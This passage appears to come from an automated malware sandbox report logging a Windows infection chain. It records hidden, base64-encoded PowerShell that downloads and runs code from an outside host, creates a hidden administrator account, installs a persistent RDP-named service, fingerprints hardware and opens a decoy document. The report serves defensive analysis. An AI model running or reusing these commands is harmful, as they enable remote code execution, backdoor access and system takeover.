ABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAFEAQQBGAE0AQQBNAEEAQQAxAEEARwAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQQBRAHcAQgBQAEEARwA0AEEAVgBBAEIARgBBAEcANABBAGQAQQBBAHAAQQBDAGsAQQAiAA=="	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoLogo -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAFQAUwB0AFIASQBOAGcAKAAoAEkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBQAFMAMAA1AG0AIgApACkAKQApAC4AQwBPAG4AVABFAG4AdAApACkA	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\40v0i4f3\40v0i4f3.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBjAG8AYwBvAG0AZQB0AGgAbwBkAGUALgBkAGUALwBmAGkAbABlADIALwA0ADQAMgBkADYAZAAyAGIAYgBiAGYAOQA1AGEAMABjADIAZAA5ADgAMwAzADUAYwA3AGMAZgAxADIAZAA5AGQANABhADIAMQA2ADMAYgBmAGQAMwAzAGYANAAyADUANAA3AGQAOABlADIAMQA3ADYAMwA0ADkAZgBjADUAYgBlAGMAOQA5ADkAZABmADcANwBlAGQANgBmAGMAMQAwAGMAZAAyAGIAOABmADEAYgBmADYAZQAxADQAMQA5AGEAZgBkADEAYgA4AGUANgA1ADIAZAA2ADAAOAAyADAAYQA1ADYAZgA1AGQAOAA3ADIAYgA5ADgAMwAyAGQANQA4AGMAZgBlADYANQAzADQAOABiAGQAYgA2ADEANgBkAGIAMgAzAGUANAAzAGYANwA5ADcAMgBkAGEAZgAzADkAMQBmADEAMwBiAGQANgBhADYAOQBjADgAOQAxADkAMAAyADgAMAA3AGEAYQBkADQAMgAzADYAMgA3ADgAMQAxAGMAOABlADAAZAA0AGEAYQA3AGUAZQA5ADMAOQBkADcANAA1ADIAMAAxAGUAZQBkADgAMAA2AGUAZQA5ADcAOQBmAGEAIgA7AA0ACgAkAGMAbwB1AG4AdAAgAD0AIAAxADAAMAA7AA0ACgANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABTAGUAbgBkACAAewANAAoAIAAgACAAIABwAGEAcgBhAG0AKAAgAFsAUABTAE8AYgBqAGUAYwB0AF0AIAAkAGwAbwBnAE0AcwBnACAAKQANAAoADQAKACAAIAAgACAAIwAgAEMAbwBuAHYAZQByAHQAIABiAG8AZAB5ACAAdABvACAAcwB0AHIAaQBuAGcADQAKACAAIAAgACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ACAAPQAgAFsAcwB0AHIAaQBuAGcAXQAoACQAbABvAGcATQBzAGcAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgAD0AIABAACgAKQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAArAD0AIAAiAC0ALQAtAC0ALQAtAC0ALQAtAC0AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAIAA9ACAAQAB7AH0AOwANAAoAIAAgACAAIAAkAGsAZQB5ACAAPQAgACIAQwBvAG4AdABlAG4AdAAtAFQAeQBwAGUAIgA7AA0ACgAgACAAIAAgACQAdgBhAGwAdQBlACAAPQAgACIAYQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AagBzAG8AbgAiADsADQAKAA0ACgAgACAAIAAgACQAaABlAGEAZABlAHIAcwBbACQAawBlAHkAXQAgAD0AIAAkAHYAYQBsAHUAZQA7AA0ACgAgACAAIAAgACQAdQByAGkAIAA9ACAAIgBMAE8ARwBVAFIATAAiADsADQAKACAAIAAgACAAdAByAHkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGIAbwBkAHkAIAA9ACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBNAGUAdABoAG8AZAAgAFAAbwBzAHQAIAAtAEgAZQBhAGQAZQByAHMAIAAkAGgAZQBhAGQAZQByAHMAIAAtAEIAbwBkAHkAIAAkAGIAbwBkAHkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAANAAoAfQANAAoADQAKAHcAaABpAGwAZQAoACQAYwBvAHUAbgB0ACAALQBnAHQAIAAwACkADQAKAHsADQAKAAkADQAKAAkAdAByAHkAewANAAoAIAAgACAAIAAgACAAIAAgAFMAZQBuAGQAIAAiAGIAZQBnAGkAbgAgAGQAbwB3AG4AbABvAGEAZAAgACQAdQByAGkAIgA7AA0ACgAJAAkAJABjAG8AbgB0AGUAbgB0ACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AA0ACgAgACAAIAAgACAAIAAgACAAJABiAHkAdABlAEEAcgByAGEAeQAgAD0AIAAkAGMAbwBuAHQAZQBuAHQALgBjAG8AbgB0AGUAbgB0ADsADQAKACAAIAAgACAAIAAgACAAIABmAG8AcgAgACgAJABpAC	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD097.tmp" "c:\Users\user\AppData\Local\Temp\40v0i4f3\CSCD6446BB959A24110B54C9D2694B6A8A7.TMP"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Temp\JD-Meta-Ads-Manager.pdf.docx" /o ""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBjAG8AYwBvAG0AZQB0AGgAbwBkAGUALgBkAGUALwBmAGkAbABlADIALwA0ADQAMgBkADYAZAAyAGIAYgBiAGYAOQA1AGEAMABjADIAZAA5ADgAMwAzADUAYwA3AGMAZgAxADIAZAA5AGQANABhADIAMQA2ADMAYgBmAGQAMwAzAGYANAAyADUANAA3AGQAOABlADIAMQA3ADYAMwA0ADkAZgBjADUAYgBlAGMAOQA5ADkAZABmADcANwBlAGQANgBmAGMAMQAwAGMAZAAyAGIAOABmADEAYgBmADYAZQAxADQAMQA5AGEAZgBkADEAYgA4AGUANgA1ADIAZAA2ADAAOAAyADAAYQA1ADYAZgA1AGQAOAA3ADIAYgA5ADgAMwAyAGQANQA4AGMAZgBlADYANQAzADQAOABiAGQAYgA2ADEANgBkAGIAMgAzAGUANAAzAGYANwA5ADcAMgBkAGEAZgAzADkAMQBmADEAMwBiAGQANgBhADYAOQBjADgAOQAxADkAMAAyADgAMAA3AGEAYQBkADQAMgAzADYAMgA3ADgAMQAxAGMAOABlADAAZAA0AGEAYQA3AGUAZQA5ADMAOQBkADcANAA1ADIAMAAxAGUAZQBkADgAMAA2AGUAZQA5ADcAOQBmAGEAIgA7AA0ACgAkAGMAbwB1AG4AdAAgAD0AIAAxADAAMAA7AA0ACgANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABTAGUAbgBkACAAewANAAoAIAAgACAAIABwAGEAcgBhAG0AKAAgAFsAUABTAE8AYgBqAGUAYwB0AF0AIAAkAGwAbwBnAE0AcwBnACAAKQANAAoADQAKACAAIAAgACAAIwAgAEMAbwBuAHYAZQByAHQAIABiAG8AZAB5ACAAdABvACAAcwB0AHIAaQBuAGcADQAKACAAIAAgACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ACAAPQAgAFsAcwB0AHIAaQBuAGcAXQAoACQAbABvAGcATQBzAGcAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgAD0AIABAACgAKQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAArAD0AIAAiAC0ALQAtAC0ALQAtAC0ALQAtAC0AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAIAA9ACAAQAB7AH0AOwANAAoAIAAgACAAIAAkAGsAZQB5ACAAPQAgACIAQwBvAG4AdABlAG4AdAAtAFQAeQBwAGUAIgA7AA0ACgAgACAAIAAgACQAdgBhAGwAdQBlACAAPQAgACIAYQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AagBzAG8AbgAiADsADQAKAA0ACgAgACAAIAAgACQAaABlAGEAZABlAHIAcwBbACQAawBlAHkAXQAgAD0AIAAkAHYAYQBsAHUAZQA7AA0ACgAgACAAIAAgACQAdQByAGkAIAA9ACAAIgBMAE8ARwBVAFIATAAiADsADQAKACAAIAAgACAAdAByAHkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGIAbwBkAHkAIAA9ACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBNAGUAdABoAG8AZAAgAFAAbwBzAHQAIAAtAEgAZQBhAGQAZQByAHMAIAAkAGgAZQBhAGQAZQByAHMAIAAtAEIAbwBkAHkAIAAkAGIAbwBkAHkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAANAAoAfQANAAoADQAKAHcAaABpAGwAZQAoACQAYwBvAHUAbgB0ACAALQBnAHQAIAAwACkADQAKAHsADQAKAAkADQAKAAkAdAByAHkAewANAAoAIAAgACAAIAAgACAAIAAgAFMAZQBuAGQAIAAiAGIAZQBnAGkAbgAgAGQAbwB3AG4AbABvAGEAZAAgACQAdQByAGkAIgA7AA0ACgAJAAkAJABjAG8AbgB0AGUAbgB0ACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AA0ACgAgACAAIAAgACAAIAAgACAAJABiAHkAdABlAEEAcgByAGEAeQAgAD0AIAAkAGMAbwBuAHQAZQBuAHQALgBjAG8AbgB0AGUAbgB0ADsADQAKACAAIAAgACAAIAAgACAAIABmAG8AcgAgACgAJABpACAAPQAgADAAOwAgAC
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc stop "myRdpService"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net start "myRdpService"
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start "myRdpService"
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\regedit.exe "regedit.exe" /e "C:\Windows\Temp\regBackup.reg" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService"
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "systeminfo \| Select-String \"OS Name\",\"OS Version\";"
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\cmd.exe /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\systeminfo.exe "C:\Windows\system32\systeminfo.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
